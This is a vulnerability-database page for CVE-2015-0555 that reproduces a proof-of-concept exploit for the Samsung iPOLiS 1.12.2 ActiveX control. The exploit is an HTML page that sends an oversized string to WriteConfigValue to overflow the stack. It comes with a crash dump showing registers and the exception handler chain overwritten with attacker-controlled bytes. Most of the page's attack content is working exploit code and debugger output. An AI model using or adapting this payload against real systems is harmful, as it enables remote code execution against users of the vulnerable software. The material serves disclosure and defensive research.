Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Samsung iPOLiS 1.12.2 - iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue PoC

🗓️ 23 Feb 2015 00:00:00Reported by Praveen DarshanamType 
zdt
 zdt🔗 0day.today👁 28 Views

Samsung iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue Remote Code Execution Po

Related
Code
ReporterTitlePublishedViews
Family
CNVD		Samsung iPOLiS Device Manager Buffer Overflow Vulnerability
27 Feb 201500:00
cnvd
Check Point Advisories		Samsung iPOLiS Device Manager WriteConfigValue Stack Buffer Overflow (CVE-2015-0555)
29 Mar 201500:00
checkpoint_advisories
CVE		CVE-2015-0555
24 Feb 201515:00
cve
Cvelist		CVE-2015-0555
24 Feb 201515:00
cvelist
Exploit DB		Samsung iPOLiS 1.12.2 - iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue (PoC)
22 Feb 201500:00
exploitdb
exploitpack		Samsung iPOLiS 1.12.2 - iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue (PoC)
22 Feb 201500:00
exploitpack
NVD		CVE-2015-0555
24 Feb 201515:59
nvd
OpenVAS		Samsung iPOLiS Device Manager Buffer Overflow Vulnerability
20 Mar 201500:00
openvas
Packet Storm		Samsung iPolis Buffer Overflow
21 Feb 201500:00
packetstorm
Packet Storm		Samsung iPOLiS 1.12.2 ReadConfigValue Remote Code Execution
15 Apr 201500:00
packetstorm
Rows per page
<!--
# Exploit Title: (0day)Samsung iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue Remote Code Execution PoC (CVE-2015-0555)
# Date: 22/02/2015
# Exploit Author: Praveen Darshanam
# Vendor Homepage: *https://www.samsung-security.com/Tools/device-manager.aspx
# Version: Samsung iPOLiS 1.12.2
# Tested on: Windows 7 Ultimate N SP1
# CVE: 2015-0555
-->
 
<html>
<!--
Vulnerability found and PoC coded by Praveen Darshanam
http://blog.disects.com
CVE-2015-0555
targetFile = "C:\Program Files\Samsung\iPOLiS Device Manager\XnsSdkDeviceIpInstaller.ocx"
prototype  = "Function WriteConfigValue ( ByVal szKey As String ,  ByVal szValue As String ) As Long"
memberName = "WriteConfigValue"
progid     = "XNSSDKDEVICELib.XnsSdkDevice"
Operating System = Windows 7 Ultimate N SP1
Vulnerable Software = Samsung iPOLiS 1.12.2
CERT tried to coordinate but there wasn't any response from Samsung
-->
<head> Samsung iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue Remote Code Execution PoC </head>
<object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target'> </object>
<script>
var arg1 = "";
var arg2="praveend";
 
for (i=0; i<= 15000; i++)
{
    arg1 += "A";
}
 
target.WriteConfigValue(arg1 ,arg2);
 
</script>
</html>
 
<!--
#############Stack Trace####################
Exception Code: ACCESS_VIOLATION
Disasm: 149434  MOV AL,[ESI+EDX]
 
Seh Chain:
--------------------------------------------------
1   647C7D7D    mfc100.dll
2   647D0937    mfc100.dll
3   64E242CA    VBSCRIPT.dll
4   77B3E0ED    ntdll.dll
 
 
Called From                   Returns To
--------------------------------------------------
XNSSDKDEVICE.149434           41414141
41414141                      414141
414141                        3DA4C4
3DA4C4                        mfc100.647790C1
mfc100.647790C1               56746C75
 
 
Registers:
--------------------------------------------------
EIP 00149434
EAX 00003841
EBX 00609FB0 -> 0015A564
ECX 00003814
EDX 00414141
EDI 0000008F
ESI 0000008F
EBP 002BE5FC -> Asc: AAAAAAAAAAA
ESP 002BE564 -> 0000000C
 
 
Block Disassembly:
--------------------------------------------------
149423  XOR EDI,EDI
149425  XOR ESI,ESI
149427  MOV [EBP-8C],ECX
14942D  TEST ECX,ECX
14942F  JLE SHORT 00149496
149431  MOV EDX,[EBP+8]
149434  MOV AL,[ESI+EDX]      <--- CRASH
149437  CMP AL,2F
149439  JNZ SHORT 00149489
14943B  MOV ECX,EBX
14943D  TEST ESI,ESI
14943F  JNZ SHORT 0014944D
149441  PUSH 159F28
149446  CALL 0014F7C0
14944B  JMP SHORT 00149476
 
 
ArgDump:
--------------------------------------------------
EBP+8   00414141
EBP+12  003DA4C4 -> Asc: defaultV
EBP+16  647790C1 -> EBE84589
EBP+20  FFFFFFFE
EBP+24  646CBE5C -> CCCCCCC3
EBP+28  0000001C
 
 
Stack Dump:
--------------------------------------------------
2BE564 0C 00 00 00 00 E6 2B 00 B0 93 14 00 14 38 00 00  [................]
2BE574 C4 A4 3D 00 41 41 41 41 41 41 41 41 41 41 41 41  [................]
2BE584 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  [................]
2BE594 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  [................]
2BE5A4 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  [................]
 
-->

#  0day.today [2018-01-08]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
23 Feb 2015 00:00Current
6.5Medium risk
Vulners AI Score6.5
EPSS0.24857
samsung ipolis 1.12.2xnssdkdeviceipinstalleractivexremote code executioncve-2015-0555praveen darshanamwindows 7 ultimate n sp1vulnerability
28